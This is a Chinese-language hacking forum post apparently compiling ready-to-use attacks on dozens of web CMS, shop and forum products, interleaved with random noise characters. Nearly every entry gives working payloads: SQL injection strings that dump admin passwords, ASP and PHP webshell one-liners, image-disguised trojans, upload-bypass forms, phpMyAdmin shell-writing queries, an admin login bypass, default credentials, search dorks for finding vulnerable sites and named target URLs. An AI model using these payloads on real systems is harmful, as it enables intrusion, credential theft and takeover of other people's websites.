启航企业建站系统 cookie注入漏洞通杀所有版本4 x) K3 n1 |& D) A4 l& x N0 M
( Z9 h' a2 d) \
直接上exploit:6 Y! L7 e' w" E) D% i- o
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
5 z m- X3 b6 a3 z; ~; Jtest:http://www.tb11.net/system/xitong/shownews.asp?id=210; U6 B8 A. j+ R! I0 b
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------& e% c( c. c5 C$ n( K
Asprain论坛 注册用户 上传图片就可拿到webshell' p" ]3 J+ m" ^( `7 g. Z
4 `" B9 u0 _( _
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。% F0 q3 N: C/ ^* r0 D
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
; i" M; p' x; `5 J8 s9 l2.gif 为一小图片文件,一定要小,比如qq表情图片* E0 v ]0 ]; y0 I6 c
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
0 q7 N, c" k2 |; c- F4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
( a4 V8 D$ }! C7 f5.q.asp;.gif; G: V, `( e+ w! _& X+ E3 v" Q
google:Powered by Asprain
! Y8 `7 u! [/ h; O* B: D--------------------------------------------------------------------------------------------------------------------------------------------------------------------------) ~( k! V7 T$ j. T; L' Z7 i
! k' u% u' e+ K$ t$ [ShopNum1全部系统存在上传漏洞。
3 m# ^0 n3 i5 y+ \9 B4 ?8 S, S5 Q; w6 |
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
1 O3 K8 p2 b. u: a/ E/ G1 w按说明 提示登录后台。。
0 h$ g2 i2 h! r( o+ e8 ]; k在后台功能页面->附件管理->附件列表9 [/ Z3 z6 G$ E* x+ |8 { B
可以直接上传.aspx 后缀木马
( i% ^) }- X. d; [% x% ahttp://demo.shopnum1.com/upload/20110720083822500.aspx
/ P' X0 v$ D# Q4 |! q t+ q4 ?--------------------------------------------------------------------------------------------------------------------------------------------------------------------------' \# q2 G# y! g
3 \" d5 g- g6 `
牛牛CMS中小企业网站管理系统 上传漏洞
* w/ g) h9 X3 N+ H# I: K7 F+ G& O
1 e/ u( `4 ~* s牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
2 L% T# c/ r3 g) q后台:admin/login.asp
$ T; g2 q/ z$ w Yewebeditor 5.5 Nday3 j% B$ D; n. A* x# P
exp:' x0 l4 ]% Q) K, f6 L
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
! V8 E# D4 G: s+ G: i<input?type=file?name=uploadfile?size=100><br><br>?
$ O5 o+ M1 V! W: d, N<input?type=submit?value=upload>?9 x+ s2 ~9 P$ Y
</form>
) H( P4 n6 `# ?8 s! }$ v3 ^9 j2 Gps:先上传小马.7 O9 L" v4 D k S5 H8 v' b' C9 n0 H# C
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏$ T. y' U2 J- N0 B. J: v
9 X. g+ r R* s, h& |8 I) g
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 ~: Q) \! C+ ~/ _0 O$ M, R+ \$ o: Q4 B* E
YothCMS 遍历目录漏洞# B! P; N9 [' C k
6 p+ D8 e8 h3 H3 B2 K; F7 L
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。( ]; m1 L2 \7 I
默认后台:admin/login.asp6 f" S2 `1 @/ N% T2 c9 i
遍历目录:
$ t3 l& ~. m$ L4 C7 H2 pewebeditor/manage/upload.asp?id=1&dir=../: D1 R" H% s" x
data:
0 A: \3 [4 K. nhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
& M+ F3 L8 a& \--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* w: v6 s2 B9 w8 @
: Q6 I! u& k1 o5 W- }4 p8 P: R& FNet112企业建站系统 1.01 _+ a" l; y) o% L0 H
( M& T2 v6 d- L6 _# Y h- W
源码简介:3 w! m) i5 N6 Z2 I/ s6 d6 h
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。9 X" ^, r: @5 S) V
添加管理员:, k+ a8 j! t) R$ s7 u2 N
http://www.0855.tv/admin/admin.asp?action=add&level=2
) l& A+ x1 @- ~3 a其实加不加都不是很重要,后台文件都没怎么作验证。
3 `9 q1 p9 _ q) h# \( z上传路径:
/ Y6 N3 B* n7 H& D" lhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=2005 m( [4 x, H+ L* L8 [
http://www.0855.tv/inc/Upfile.asp?Stype=2
3 e# A7 J& Q; G9 Y9 q7 v1 K怎么利用自己研究。
+ z- M* ~% ^9 d3 s M' f2 E. d) T. I遍历目录:$ f; g: r% l( E& _
http://www.0855.tv/admin/upfile.asp?path=../..
% X. |! d9 f$ m" _( ~如:% l5 P. L0 p! J% Z
http://www.0855.tv/admin/upfile.asp?path=../admin1 P/ T; `* Z2 k# W! Z" U2 u
http://www.0855.tv/admin/upfile.asp?path=../data# [- x& X' t+ ^
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 h+ z+ z9 Z9 h
h0 V+ @3 j7 _9 `( c" l
易和阳光购物商城通杀 上传漏洞
9 a) O( e7 N5 F5 k& l2 W W- U! b" A& O7 A8 ]6 I
前提要求是IIS6.0+asp坏境。) I5 ~" {$ l/ V$ O2 @
漏洞文件Iheeo_upfile.asp
* e. n: l0 I$ P4 T& L过滤不严.直接可以iis6.0上传
& p* }3 F! @, [把ASP木马改成0855.asp;1.gif
- U* _8 g+ i9 G4 l `, O4 [直接放到明小子上传
l* @2 M: A3 p, o# WGoogle搜索:inurl:product.asp?Iheeoid=2 {8 s V T. a1 ^; E7 i
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& M$ x. ^/ s' a6 N! G4 |) x
: S6 g# `7 ]/ `( h* D6 O. ^phpmyadmin后台4种拿shell方法
+ |4 c0 h- T C* T" }3 D2 z$ d! B: o1 T; R$ c; L0 q+ h. X
方法一:8 w2 c4 A7 d P( w& U$ _8 T
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );" I: \+ M- _( O" ?8 K o# c
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
& ]- o: U) W( V8 S1 G. I' ESELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';* l+ i; ~" n3 d# S' q& F& O( P
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php6 U- B3 s8 G' p) E4 \1 S
一句话连接密码:xiaoma$ h. p' y; r8 V$ c0 o
方法二:
! r0 ^: v2 E1 NCreate TABLE xiaoma (xiaoma1 text NOT NULL);6 T) z' l& Z' k/ C! A1 _5 \. r6 r
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');7 r- f1 @# y' }7 N8 @' \$ r! `
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
* v L) T% M- ]Drop TABLE IF EXISTS xiaoma;5 X/ k5 k$ ` ~- C# d
方法三:
7 `: l+ t" `2 k/ a) E/ o( _读取文件内容: select load_file('E:/xamp/www/s.php');
+ T s1 T8 h: l写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'( x4 y( s; Q2 a8 k9 j$ k' j
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
/ K5 J! W+ m5 Z; H- W2 y8 e* L方法四:) }4 G! R- N% g2 \" a* V) D
select load_file('E:/xamp/www/xiaoma.php');/ u. g$ X7 T; g+ Y$ R7 |8 ?- _
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
r3 Q2 S8 v3 l然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir H. R! r$ o7 M- S# j
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! v9 J t6 |. G( Y
- H8 i3 c3 L/ M3 L2 T [传信网络独立开发网站源码0day漏洞5 D `- n1 b/ T; t$ f
( ^8 O! A; D# o# y7 r. W% }后台system/login.asp
& v Q8 E; j* v- R h) D- b, A进了后台有个ewebeditor
. J0 X: a# [; XGoogle 搜索inurl:product1.asp?tyc=
( V+ }7 M' m2 X, n1 a0 h& M编辑器漏洞默认后台ubbcode/admin_login.asp
2 O; m# Q% F9 W6 W数据库ubbcode/db/ewebeditor.mdb
$ t+ I; G# Y# v: [$ u1 i6 w默认账号密码yzm 111111
& M2 g2 }3 i9 V* S4 [ C H4 S3 v0 G: v
. o1 m5 [* F# _/ @! z) h( W7 r拿webshell方法7 U8 r2 d9 }4 z/ Y
登陆后台点击“样式管理”-选择新增样式 1 `. [+ D; O# a+ t; ^
样式名称:scriptkiddies 随便写
5 D) A3 B( s4 Z# k3 q+ G. I路径模式:选择绝对路径 3 O7 H2 i# d' V3 \5 u) V5 r# x
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
S+ B4 Y/ |3 t- `/ x K: ~- H; P图片类型比如就是我们要上传的ASP木马格式
$ k2 D8 c5 _; `) Q上传路径:/7 Z, J8 i$ u8 n* l& x; N8 u
图片限制:写上1000 免的上不了我们的asp木马
- ]! K5 f9 N3 Q: q- B上传内容不要写
1 _$ V3 i+ L: X5 s4 ]. M4 U& @可以提交了 ! s2 \3 A' j0 r
样式增加成功!
' X6 z3 k, m4 y返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 " i; W& y5 h9 _, d
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
* i# t4 c( O1 I! C网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
) o0 W( U4 ]: J: m上ASP木马 回车 等到路径: v0 G& [& E4 M' s* W; L0 U& W: r8 Y+ E
/ [8 `: n9 Z( W$ F* d
后台:system/login.asp
' J/ p- c7 d0 V+ \$ x: LExp:
+ G1 ?" o5 i i8 }$ nand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
- v7 c _% E6 l x k测试:
1 b0 ]% K g ?- u6 mhttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
0 R9 r; g( t' k1 B4 [http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master# T, L/ R& g. v9 [4 k! [4 N
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 d2 J8 I. M* p
$ l* z! J+ k, Z0 Dfoosun 0day 最新注入漏洞) R# M4 Y2 [$ k% h8 P
. |3 w, Q4 O( S" I1 m! e* Q" {
漏洞文件:www.xxx.com/user/SetNextOptions.asp" o, Y9 R( x! k$ y: a+ d
利用简单的方法:! J( \9 \3 x3 x. e
暴管理员帐号:
" L1 ~, o6 b u2 Thttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin* i4 f" Z0 K, K) T9 R# L* L
暴管理员密码:' _- H( Z3 ?/ Q* K
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,/ `# c; M2 k b8 ^' s# D# H) L
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 O5 k; g; B; z+ A) f
2 S( U% Z# ]" B& i' k- Y- ^- @网站程序的版权未知!! y1 C% y. {- N! S8 g7 L
. P: T7 B- x6 ]: F U$ D默认网站数据库:
: T) c% R# X- X. ~: Nwww.i0day.com/data/nxnews.mdb
3 O7 C- t9 n( E9 P( Jewebeditor 在线编辑器:
. B) s9 g1 h1 p9 s编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb. G5 k$ Z" M: B! D P9 [
登录地址:ewebeditor/admin_login.asp
& p v6 g4 r% e1 p/ i. T* b/ u8 i默认密码:admin admin
' F. R& v% N! ]% [0 e0 o登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
% {# }( n1 H g$ F7 k7 } Y
9 l9 o' g6 [6 i/ @1 [Sql注入漏洞:( X1 @( d' I& ?
http://www.i0day.com/detail.asp?id=12
* F2 {9 K% H2 [$ o+ iexp:
: h. E6 {) N' X1 s: F5 F# |union select 1,admin,password,4,5,6,7,8 from admin3 X' s+ l t0 O1 D5 X+ T) h: Z- c
爆出明文帐号/密码& S# N9 p/ H0 g; M/ q
# `, I- q% S: e, L
上传漏洞:' T1 f' l8 z0 f/ @2 ^" n7 j, C2 _
后台+upfile.asp
9 u Z; { `. a# C4 e3 e( J: b如:
6 K+ x- j/ e: g7 |- u+ B% [http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。; S; ]- ~, Y9 T
shell的地址:网址+后台+成功上传的马. T, e7 `5 \8 O8 N0 H
google:inurl:news.asp?lanmuName=( \) n8 O3 } i( L
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
{9 q, [1 P7 T# B8 v" @# u
& J, @' s2 y; K8 }2 ~dedecms最新0day利用不进后台直接拿WEBSHELL% n- Q5 i# u/ {8 X
: ?3 i6 S+ I* y拿webshell的方法如下:
4 s* }' c2 Q, p4 H0 J网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.& p+ j) G9 k7 o, y% ^
前题条件,必须准备好自己的dede数据库,然后插入数据:
+ J& h/ [; g5 F' H5 I2 Vinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
) w* a- t/ \. K- r K9 T" P/ T, z0 i' M
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。" A* K& |. ?0 O
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">( b* k% _/ X2 Q3 ~* q( N& \$ h
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />+ V$ J0 _8 E) G) n# l* B \5 r5 m
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />4 d1 Q, o" z6 {2 @' U( U# |4 K
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
# C. F# q5 z, y: z8 s& h) z' A<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
8 `9 u& ?8 j% q/ f( V<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />- U" D* p. Z7 I/ K- s$ K
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
$ X, @$ B7 O, Y9 N) I3 k; g4 Y<input type="text" value="true" name="nocache" style="width:400">
. h& G j, z/ N& ^# n8 Z4 K. t<input type="submit" value="提交" name="QuickSearchBtn"><br />
! J* _4 A; ~" B! r4 G; J</form>: E. L8 O* X) y
<script>) x2 W7 @9 f8 F
function addaction()
2 x+ r7 F% W9 f{
. |4 H2 `8 C9 P0 Tdocument.QuickSearch.action=document.QuickSearch.doaction.value;, [$ P0 G( f/ j
}& L6 H7 w; J: k0 n$ S2 |# t
</script>, }2 L r2 }. |# |9 D
-----------------------------------------------------------------------------------------------------------------------------------------------
) E8 _% b ^. t0 I l* G# u8 `/ |! G3 ^0 y# A, h7 N0 [4 @
dedecms织梦暴最新严重0day漏洞6 b) ?3 |4 I0 {7 l
bug被利用步骤如下:5 D. G8 L4 W- e! ?9 q
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
: E* b- _1 U) a5 S) D( b* z把上面{}上的字母改为当前的验证码,即可直接进入网站后台。% w/ @' t1 c% _8 g9 a
-------------------------------------------------------------------------------------------------------------------------------------------
# g8 f" E4 r4 W% Y. F' E( i$ J4 G: M+ i, B9 m1 h' }
多多淘宝客程序上传漏洞
+ D5 T0 O% |( F3 ^% R* M7 O2 ?漏洞页面:( t- Z/ ?" m [. A3 v. U4 ]! [- U
admin\upload_pic.php
) V1 }3 q2 ?! S传送门:: W5 Z' M4 d) B5 |6 P/ W8 f5 t
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
+ t3 {$ h# v5 F4 D+ M* nPS:copy张图片马 直接 xxx.php 上传抓包地址!) u/ A6 l$ `$ o! i$ E; I0 n9 q
------------------------------------------------------------------------------------------------------------------------------------------------------% G7 l3 R. X1 u
2 S, Y4 Z6 H( ^4 H+ d. Q无忧公司系统ASP专业版后台上传漏洞
+ s8 H9 F% m/ g9 c$ Y& F" c漏洞文件 后台上传
% B5 z, g: N8 ] Zadmin/uploadPic.asp! _7 V" J0 c8 G( o- w
漏洞利用 这个漏洞好像是雷池的: \% {( N$ V' s
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=14 l: z( z5 F7 c. F
等到的webshell路径:
2 p8 @0 h4 \: r2 s/UploadFiles/scriptkiddies.asp;_2.gif
( `! @" p. D# x! A8 D& U---------------------------------------------------------------------------------------------------------------------------------------------------
Y; ~0 o( A, v( x- s& k( h! q
) G4 \/ ^( q( {$ p. l) j住哪酒店分销联盟系统2010
* X f5 j2 p# W5 ?# V& \ t7 GSearch:6 e% h: a6 w! e2 x' `( C
inurl:index.php?m=hotelinfo5 y: w. C0 e( l
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
, [2 Z' T/ o& [+ U) w4 V4 J默认后台:index.php?m=admin/login
# q/ L8 X4 @8 w2 k7 g6 w3 t--------------------------------------------------------------------------------------------------------------------------------------------------
1 H% M+ A9 A$ g, U! F* f) D1 t& y2 J7 y' X
inurl:info_Print.asp?ArticleID=
, j/ r4 O& }2 |+ G; H; [+ L" }. N后台 ad_login.asp
) W4 R8 ?$ ]. h- s2 O6 O# F0 I2 P爆管理员密码:& {/ Q1 F" h" x, G p+ D
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
# R* T1 O1 C+ ^- L @! x------------------------------------------------------------------------------------------------------------------------------------------------------------2 @: Y$ Q5 x+ f- a' q" c5 p
7 j' Q/ ?& p Y+ m( h% h& B搜索框漏洞!( c' I0 L! s. c$ o! j/ j- f
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
6 H" R. X7 P G( ?: I- v) r2 M--------------------------------------------------------------------------------------------------------------------------------------------------------$ A7 Z$ P8 v& \ X5 h2 D, T
& ?) t6 Z8 z/ B; T J& \6 Y关键字:! y1 r1 T& [/ r/ G' _4 c9 x
inurl:/reg_TemletSel.asp?step=2# k: z9 L( y( K" |
或者 H& K& a) { R( Q, ?7 o
电子商务自助建站--您理想的助手
- A9 X! Q0 n8 w1 U# G-------------------------------------------------------------------------------------------------------------------------------------------------; t$ m7 ?2 @! R0 e1 W1 a
2 ]) `4 n' M$ V' [# |iGiveTest 2.1.0注入漏洞; t$ C/ H, u& _: n" r3 \( Z0 z& k
Version: <= 2.1.0
. {8 K8 p% l+ D* S5 R" i5 v$ [# Homepage: http://iGiveTest.com/1 R: S! g1 p2 C+ ]" ]: t% |
谷歌关键字: “Powered by iGiveTest”
/ k! L( B+ { g8 W随便注册一个帐号。然后暴管理员帐号和密码
3 x' [) q9 p; ghttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
2 q- O1 h3 H: u3 Y7 q- D' Z; r------------------------------------------------------------------------------------------------------------------------------------------------
% i. ~. t5 t6 x, o
( Z% H( E: ^# @ V& FCKXP网上书店注入漏洞
) O2 i2 J, w6 P6 ] E# U# k" z/ E工具加表:shop_admin 加字段:admin
m5 @- k& {4 Q& P后台:admin/login.asp % p( b- s& q: j$ @8 l# ]
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
2 [7 F7 H' r, P5 \7 [inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息% b7 m7 p5 z T3 `
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------& r" S6 t& N# P z8 k
6 f# c4 j9 T) G5 P a段富超个人网站系统留言本写马漏洞1 P; M- Q7 Z3 d A; i, U# Q
源码下载:http://www.mycodes.net/24/2149.htm
0 w$ ^3 {1 A% O$ ~# F) d yaddgbook.asp 提交一句话。+ W" A; {2 p, \" d( T
连接: http://www.xxxx.tv/date/date3f.asp
; R: n9 A4 Y& v" h& @! mgoogle:为防批量,特略!
) D) f& b- `& ]9 \4 {) b5 ? b4 _-------------------------------------------------------------------------------------------------------------------------------------------------------------------------: }2 L; |; V, [
( l( T: O) R2 j3 |6 `智有道专业旅游系统v1.0 注入及列目录漏洞% p- u' i8 g F% t- H! i
默认后台路径:/admin/login.asp
/ F8 n' U$ o1 F" _$ `( d. r默认管理员:admin
0 T; N5 K q: {% l- c/ ^' ?默认密码:123456. ?# x$ Q1 U$ i$ T' _, i; Y1 T
SQL EXP Tset:0 b: j9 [$ m; z8 y& C, V1 b) i
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin/ t* E& ^! a* @
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" M( x Z$ s3 R. a
* l+ U V0 y2 X) O$ x! xewebeditor(PHP) Ver 3.8 本任意文件上传0day# y/ ~; X% l4 }7 }# Z. z# c- q
EXP:
8 v5 w# }/ [0 Y7 g5 l: g ^<title>eWebeditoR3.8 for php任意文件上EXP</title>
8 G2 Z; p# R) f- j: M, j<form action="" method=post enctype="multip
0 I! ^2 a# {0 S( C; W8 y0 A' v& wart/form-data">
4 z; P, U9 Y/ r' a- ]( a. u3 Q7 L<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> * Q# h0 Q8 Y; l- j0 P
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> 7 y$ u4 j3 E& w Q: @# b2 V
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
! K! C; }1 J) I: u* j0 Jfile:<input type=file name="uploadfile"><br> : a. o0 w1 T" a9 n* [' J# [5 V% O0 s
<input type=button value=submit onclick=fsubmit()>
8 x# s5 n* e7 W! n/ F" Y</form><br>
( z `+ R# J9 s) Y<script>
: @" {$ ~/ d" |/ dfunction fsubmit(){
S" o x( w G5 hform = document.forms[0];
% L) K6 J# J- r: e! r; X) Oform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; . s+ G y( G, F) T0 j
alert(form.action);
% ~; ^) r; s/ C5 f1 D: o/ Y0 @/ xform.submit();
~4 i) N* X2 N5 i0 H6 g} b+ j# R4 a) A2 ?* M1 W) A5 J
</script>. T3 S5 T' _- S. u- K
注意修改里面ewebeditor的名称还有路径。
3 E% ~4 x. }$ j+ Y" w+ o9 }0 S---------------------------------------------------------------------------------------------------------------------------------------------------------------------------, X6 o4 r0 N9 i1 J* U
( G( J G2 `! C8 K9 L
提交’时提示ip被记录 防注入系统的利用* S3 {2 Z( x! S3 E
网址:http://www.xxx.com/newslist.asp?id=122′5 M( \: E8 z7 |' I" X4 x
提示“你的操作已被记录!”等信息。
3 C1 K) |1 O( h利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。. G. j' |0 p7 n* e* U
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ \5 A) X* y% }5 L/ ^2 b+ f
* l3 J1 W" O; B8 b Q' r- R西部商务网站管理系统 批量拿shell-0day
, M: _! s+ s, `8 K; Y这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
3 m; _; e1 n' P+ X' B& K1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
# Y7 s! M4 \) ?. B. u) u* J" A2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
2 _+ X' J$ C7 @7 H3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
; W; q* G6 O i. Z---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. ~; A5 P+ i& V1 i! d9 Y3 k% p2 m8 m9 ^% a
JspRun!6.0 论坛管理后台注入漏洞) ]$ x: y0 n/ h3 j) t
1 r% @) I# M) u3 ^6 S! o$ B
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
4 t; d8 x; i* @, v% ^% uJspRun!6.0 % U! z1 l9 ]' \- ^9 V+ \
漏洞描述:" m( v" O1 S' G+ V; w
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。. \) m" X; K. N+ E0 v0 @
在处理后台提交的文件中ForumManageAction.java第1940行
. P% ~3 R0 {! {6 ]) LString export = request.getParameter("export");//直接获取,没有安全过滤4 u) C$ p; b, j( C
if(export!=null){" f$ f7 C9 n( B r- x: ^* k% R8 z) d
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
4 P% x: `& ~) {# F3 Cif(styles==null||styles.size()==0){' b8 w1 a) \1 @# Z! m7 ^
<*参考
" o8 U) [( B: L5 R. p1 f# g! I- Inuanfan@gmail.com
5 |/ m$ w6 }, m* b0 k*> SEBUG安全建议:
5 X/ L* `8 a! p; ^. V& ]% C! Mwww.jsprun.net
0 T2 D! I5 v2 A; _- t3 {5 `(1)安全过滤变量export
/ X+ b9 b1 k" s* f) ~# s* A(2)在查询语句中使用占位符
I+ U3 i z% R, ~: }$ N5 n( O------------------------------------------------------------------------------------------------------------------------------------------------------------------------------% j8 m; R4 r0 v, R' A8 W- V. T
2 C+ i( B6 e& ^. V4 E
乌邦图企业网站系统 cookies 注入
F- u4 b, _8 n6 i, R& |! t- O' @) `
程序完整登陆后台:/admin/login.asp
. g" s$ l. E( `$ h1 T默认登陆帐号:admin 密码:admin888
2 X4 N/ _1 n/ s. _- ]语句:(前面加个空格)% n: ?1 R) ~* s: T8 q
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
7 ^9 S& b+ ?7 P* z8 H或者是16个字段:
2 \8 ~! C `4 L! d% L) j/ g5 ~" Dand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
% h7 Q1 Z5 b. M' z$ L% \3 _爆不出来自己猜字段。3 |, I* c o0 Z; o
注入点:http://www.untnt.com/shownews.asp?=88& k( {7 [$ D: v
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
. K" }- s; g; Z n3 @, [1 N4 j% p关键字:
8 m+ `2 h; {# E( Jinurl:shownews?asp.id=5 u' u; _4 y! J, g( V
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 D2 R( d, T. h( s- b; p3 C0 B; Y7 U" X w: ` y& l
CKXP网上书店注入漏洞
, _" Z, z+ P! E% r, @. y! l: L# p! E
工具加表:shop_admin 加字段:admin
3 |& h6 K5 [, i" l% m后台:admin/login.asp % P; m* B/ b& `, k% D4 k
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/6 B# C9 u9 e2 u7 A- g& w( m& G
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
! b; C- u# O3 R5 g# s5 M: B---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 o2 _3 V" n' U3 C0 n, |" E+ P3 Q ?' }5 ?$ Y! h, C0 J
YxShop易想购物商城4.7.1版本任意文件上传漏洞( L5 r, J+ S. @* [& J' ^/ A
4 g- A Q1 R1 f" S% I% v3 whttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
) h. l& E2 q+ ]0 c5 d" F A2 }跳转到网站根目录上传任意文件。
% B3 F0 J7 J. m3 S9 }如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
